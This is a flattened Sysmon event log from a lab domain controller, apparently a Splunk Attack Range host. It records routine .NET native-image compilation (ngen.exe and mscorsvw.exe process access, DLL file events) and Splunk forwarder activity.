21:05:48.294{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A22C-60D3-8C04-00000000CF01}3596C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021662Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:48.200{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A22C-60D3-8B04-00000000CF01}6444C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021661Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:48.169{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A22C-60D3-8B04-00000000CF01}6444C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021660Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:48.169{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A22C-60D3-8B04-00000000CF01}6444C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021669Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:49.950{4DB9351A-A22C-60D3-8C04-00000000CF01}3596C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\e0c-0\System.IdentityModel.dll2021-06-23 21:05:49.950 23542300x800000000000000021668Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:49.810{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4926C9CBD798CD78171CAE066689F933,SHA256=A913EE42339CA66AE4FFE65CA6E0019CDBD7C3EB9E76A94FFE066E1E9729F2A8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000021684Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:50.815{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DDE46173C8F668610AADCF89E301C589,SHA256=78EE806A84A7662DA1C533C857325D6F08749E682040930F96BA4BF645C3B174,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021683Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:50.799{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A22E-60D3-9004-00000000CF01}4076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021682Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:50.784{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A22E-60D3-9004-00000000CF01}4076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021681Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:50.784{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A22E-60D3-9004-00000000CF01}4076C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021680Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:50.487{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A22E-60D3-8F04-00000000CF01}4272C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021679Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:50.456{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A22E-60D3-8F04-00000000CF01}4272C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021678Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:50.456{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A22E-60D3-8F04-00000000CF01}4272C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021677Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:50.393{4DB9351A-A22E-60D3-8E04-00000000CF01}5916C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\171c-0\System.IdentityModel.Selectors.dll2021-06-23 21:05:50.393 10341000x800000000000000021676Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:50.268{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A22E-60D3-8E04-00000000CF01}5916C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000021675Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:48.114{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61443-false10.0.1.12-8000- 10341000x800000000000000021674Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:50.221{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A22E-60D3-8E04-00000000CF01}5916C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021673Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:50.206{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A22E-60D3-8E04-00000000CF01}5916C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021672Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:50.107{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A22E-60D3-8D04-00000000CF01}3600C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021671Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:50.075{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A22E-60D3-8D04-00000000CF01}3600C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021670Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:50.075{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A22E-60D3-8D04-00000000CF01}3600C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021708Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:05:51.987{4DB9351A-A22F-60D3-9604-00000000CF01}6540C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\198c-0\System.IO.Log.dll2021-06-23 21:05:51.987 23542300x800000000000000021707Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:51.816{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=785C8446957744D0D6F4668FD4C89A11,SHA256=96F55DF08EABBF1851734A91154D1AC3658FA8C50D3682B976ACE637F8D87011,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021706Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:51.768{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A22F-60D3-9604-00000000CF01}6540C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021705Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:51.753{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A22F-60D3-9604-00000000CF01}6540C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021704Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:51.753{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A22F-60D3-9604-00000000CF01}6540C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021703Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:51.690{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A22F-60D3-9504-00000000CF01}4360C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021702Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:05:51.674{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A22F-60D3-9504-00000000CF01}4360C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 